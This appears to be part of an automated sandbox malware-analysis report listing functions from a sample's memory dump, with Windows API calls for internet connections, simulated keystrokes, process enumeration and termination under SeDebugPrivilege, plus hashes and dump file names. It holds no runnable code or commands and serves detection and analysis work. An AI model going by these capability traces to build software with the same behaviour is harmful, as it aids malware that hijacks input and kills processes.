                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003A68B9
                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003A68D1
                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003A68F2
                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00368874,00000000,00000000,00000000,000000FF,00000000), ref: 003A6901
                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003A691E
                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00368874,00000000,00000000,00000000,000000FF,00000000), ref: 003A692D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                  • String ID:
                                  • API String ID: 1268354404-0
                                  • Opcode ID: 4369fb1b97d2c81b822bb7b37b64cbedc07d60836385cadda528bd82afa5f67a
                                  • Instruction ID: 752d008ccc410e55120d40cd5c36862f952f2c392681377267c50bd39b27bdbd
                                  • Opcode Fuzzy Hash: 4369fb1b97d2c81b822bb7b37b64cbedc07d60836385cadda528bd82afa5f67a
                                  • Instruction Fuzzy Hash: A7519FB0600209EFDB22CF25CC95FAA77B9FB59750F144618F9129B2E0DB70E991DB50
                                  Function 003CC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003CC182
                                  • GetLastError.KERNEL32 ref: 003CC195
                                  • SetEvent.KERNEL32(?), ref: 003CC1A9
                                    • Part of subcall function 003CC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003CC272
                                    • Part of subcall function 003CC253: GetLastError.KERNEL32 ref: 003CC322
                                    • Part of subcall function 003CC253: SetEvent.KERNEL32(?), ref: 003CC336
                                    • Part of subcall function 003CC253: InternetCloseHandle.WININET(00000000), ref: 003CC341
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                  • String ID:
                                  • API String ID: 337547030-0
                                  • Opcode ID: 3082e46889ab0744da20eeef6d71dc2a433bba043ad88e25972bcaf67f05303a
                                  • Instruction ID: 6a7767949fd9b6702ab295d2fb0e4f583dc8c3fc513e9605631b812b28dee49d
                                  • Opcode Fuzzy Hash: 3082e46889ab0744da20eeef6d71dc2a433bba043ad88e25972bcaf67f05303a
                                  • Instruction Fuzzy Hash: C9318971620645AFDB229FA59C44FAABBEDFF18300B04691DF95ACA610C731EC11DBA0
                                  Function 003B25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 003B3A57
                                    • Part of subcall function 003B3A3D: GetCurrentThreadId.KERNEL32 ref: 003B3A5E
                                    • Part of subcall function 003B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003B25B3), ref: 003B3A65
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B25BD
                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003B25DB
                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003B25DF
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B25E9
                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 003B2601
                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 003B2605
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 003B260F
                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 003B2623
                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 003B2627
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                  • String ID:
                                  • API String ID: 2014098862-0
                                  • Opcode ID: df15dc54a594599907c641f61d786c2b1f9ceb52971124d2f317a7a24ab87591
                                  • Instruction ID: 1c001b3629947a2b349ce4550196fbbf085e766d4c52b413e8eb09096daf9324
                                  • Opcode Fuzzy Hash: df15dc54a594599907c641f61d786c2b1f9ceb52971124d2f317a7a24ab87591
                                  • Instruction Fuzzy Hash: 3101D4303A0260BBFB2167699CCAF9A7F5DDB4EB16F101111F358AE1D1C9E224458A6A
                                  Function 003B1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,003B1449,?,?,00000000), ref: 003B180C
                                  • HeapAlloc.KERNEL32(00000000,?,003B1449,?,?,00000000), ref: 003B1813
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003B1449,?,?,00000000), ref: 003B1828
                                  • GetCurrentProcess.KERNEL32(?,00000000,?,003B1449,?,?,00000000), ref: 003B1830
                                  • DuplicateHandle.KERNEL32(00000000,?,003B1449,?,?,00000000), ref: 003B1833
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003B1449,?,?,00000000), ref: 003B1843
                                  • GetCurrentProcess.KERNEL32(003B1449,00000000,?,003B1449,?,?,00000000), ref: 003B184B
                                  • DuplicateHandle.KERNEL32(00000000,?,003B1449,?,?,00000000), ref: 003B184E
                                  • CreateThread.KERNEL32(00000000,00000000,003B1874,00000000,00000000,00000000), ref: 003B1868
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                  • String ID:
                                  • API String ID: 1957940570-0
                                  • Opcode ID: a864baadb6cfcc0131fde6a75a32ac78dbdb5baa6fa001f8d14d668fbabd5aef
                                  • Instruction ID: ac817a397be3f66a1d31f653bcf397654dc76ddaca5ca17bac747e388c26ebf4
                                  • Opcode Fuzzy Hash: a864baadb6cfcc0131fde6a75a32ac78dbdb5baa6fa001f8d14d668fbabd5aef
                                  • Instruction Fuzzy Hash: 4B01BBB5250348BFE721ABA5DC8DF6B3BACEB89B11F405511FA05DF1E1CA749801CB20
                                  Function 003DA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003BD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 003BD501
                                    • Part of subcall function 003BD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 003BD50F
                                    • Part of subcall function 003BD4DC: CloseHandle.KERNEL32(00000000), ref: 003BD5DC
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DA16D
                                  • GetLastError.KERNEL32 ref: 003DA180
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003DA1B3
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 003DA268
                                  • GetLastError.KERNEL32(00000000), ref: 003DA273
                                  • CloseHandle.KERNEL32(00000000), ref: 003DA2C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 2533919879-2896544425
                                  • Opcode ID: d350709e4c57629869d4f79ab623beb98a72b0857e0ebabc68cc1512b22805de
                                  • Instruction ID: 722694f1c6ab693368cf0bffe283866f8580d64c57e548c0e4fa556808ef04e1
                                  • Opcode Fuzzy Hash: d350709e4c57629869d4f79ab623beb98a72b0857e0ebabc68cc1512b22805de
                                  • Instruction Fuzzy Hash: E961E1312046429FD322DF15D594F1ABBE4AF44318F19848DE8664FBA3C772EC49CB82
                                  Function 003E3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003E3925
                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 003E393A
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003E3954
                                  • _wcslen.LIBCMT ref: 003E3999
                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 003E39C6
                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003E39F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window_wcslen
                                  • String ID: SysListView32
                                  • API String ID: 2147712094-78025650
                                  • Opcode ID: 5b5d52b9affd93fa13cdb4e61b4a75771d4dec5d13aa24b42a0db6559e6a88ff
                                  • Instruction ID: d0960563e2c5e8e5a849976b048874a3620284245704e3f378319b420a14e3ff
                                  • Opcode Fuzzy Hash: 5b5d52b9affd93fa13cdb4e61b4a75771d4dec5d13aa24b42a0db6559e6a88ff
                                  • Instruction Fuzzy Hash: E841C671A00268ABDF229F65CC49FEE77A9EF08350F110226F958EB2C1D7759D84CB90
                                  Function 003BBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003BBCFD
                                  • IsMenu.USER32(00000000), ref: 003BBD1D
                                  • CreatePopupMenu.USER32 ref: 003BBD53
                                  • GetMenuItemCount.USER32(01196878), ref: 003BBDA4
                                  • InsertMenuItemW.USER32(01196878,?,00000001,00000030), ref: 003BBDCC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                  • String ID: 0$2
                                  • API String ID: 93392585-3793063076
                                  • Opcode ID: b7072a8b5a73b684fe191b7412c98545d819156922e4f2560536db121994a91a
                                  • Instruction ID: 2662614660dd00d4f8f6f400831598064b445ac9c8100ce1995307173d0b587f
                                  • Opcode Fuzzy Hash: b7072a8b5a73b684fe191b7412c98545d819156922e4f2560536db121994a91a
                                  • Instruction Fuzzy Hash: 48519E70A00249DBDF22CFA9D884BEEFBF8AF45318F14461DE6119B6D0DBB89941CB51
                                  Function 00372D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                  Download Yara Rule
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 00372D4B
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00372D53
                                  • _ValidateLocalCookies.LIBCMT ref: 00372DE1
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00372E0C
                                  • _ValidateLocalCookies.LIBCMT ref: 00372E61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: &H7$csm
                                  • API String ID: 1170836740-4246003707
                                  • Opcode ID: c7d3b88416b2672e46472141c9e7c3b5b4128f3fe7f3ec7dd6b5b821a8415db4
                                  • Instruction ID: d90cb10d9a622103be77b8ecd23dc3f7afd24f0f8b8b7556982a5cdc5fa3edbd
                                  • Opcode Fuzzy Hash: c7d3b88416b2672e46472141c9e7c3b5b4128f3fe7f3ec7dd6b5b821a8415db4
                                  • Instruction Fuzzy Hash: DF418334E00209ABCF32DF68CC95A9FBBB5BF44314F15C155E8286B352D739AA05CB91
                                  Function 003BC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadIconW.USER32(00000000,00007F03), ref: 003BC913
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: IconLoad
                                  • String ID: blank$info$question$stop$warning
                                  • API String ID: 2457776203-404129466
                                  • Opcode ID: 7d1e373d231ef1a44526c1e52c22e73a30d3a0212015e16c3e7113f04ceab7d5
                                  • Instruction ID: cecb78627b93781d2e4fe29bcc3691bb2f6654d05cae7d68cfc29521ca9ee82b
                                  • Opcode Fuzzy Hash: 7d1e373d231ef1a44526c1e52c22e73a30d3a0212015e16c3e7113f04ceab7d5
                                  • Instruction Fuzzy Hash: 62112B31799306BAB7235B149C82DEE379CDF15318B21502BF604EA5C2D774AE405268
                                  Function 003BED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$LocalTime
                                  • String ID:
                                  • API String ID: 952045576-0
                                  • Opcode ID: 855786a25bb9fb31417602f5452d1ad77257f8f7b06f8a0a0bb7430a27c6e637
                                  • Instruction ID: 306727e201dec0bfb569ec976a501658aa45a7187cb424a693ec86a4de90ec0b
                                  • Opcode Fuzzy Hash: 855786a25bb9fb31417602f5452d1ad77257f8f7b06f8a0a0bb7430a27c6e637
                                  • Instruction Fuzzy Hash: BD41A965D1011876CB23E7F4888AACF77B8AF45310F508956E618F7512FB38E245C3E6
                                  Function 0036F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                  Download Yara Rule
                                  APIs
                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,003A682C,00000004,00000000,00000000), ref: 0036F953
                                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,003A682C,00000004,00000000,00000000), ref: 003AF3D1
                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,003A682C,00000004,00000000,00000000), ref: 003AF454
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ShowWindow
                                  • String ID:
                                  • API String ID: 1268545403-0
                                  • Opcode ID: 6f051dd2331350fca5768defe8dd94c206a10b56a9bfcee40ba07d3e3b70d74e
                                  • Instruction ID: 8371f6a6f770c6e805dc02f72f8845bea26beffa19377ff5f4dc2a3a772db7fa
                                  • Opcode Fuzzy Hash: 6f051dd2331350fca5768defe8dd94c206a10b56a9bfcee40ba07d3e3b70d74e
                                  • Instruction Fuzzy Hash: 3F414D30608780BED73B9B69E8C872A7BE9EB57314F15C53CE097579A8C731A881CB11
                                  Function 003E2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 003E2D1B
                                  • GetDC.USER32(00000000), ref: 003E2D23
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003E2D2E
                                  • ReleaseDC.USER32(00000000,00000000), ref: 003E2D3A
                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003E2D76
                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003E2D87
                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003E5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 003E2DC2
                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003E2DE1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                  • String ID:
                                  • API String ID: 3864802216-0
                                  • Opcode ID: 86e37d13951eac943893513937b47dfd5cdd141d0b96bf1c90131e56c90140d3
                                  • Instruction ID: 88cfbf421ea2e7171a2703f87a3989ec2545161e2f1473efe36413702eb8cd81
                                  • Opcode Fuzzy Hash: 86e37d13951eac943893513937b47dfd5cdd141d0b96bf1c90131e56c90140d3
                                  • Instruction Fuzzy Hash: 84318D722112A4BFEB228F558C8AFEB3BADEB49711F084155FE089E2D1C6759C41C7A0
                                  Function 003B5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
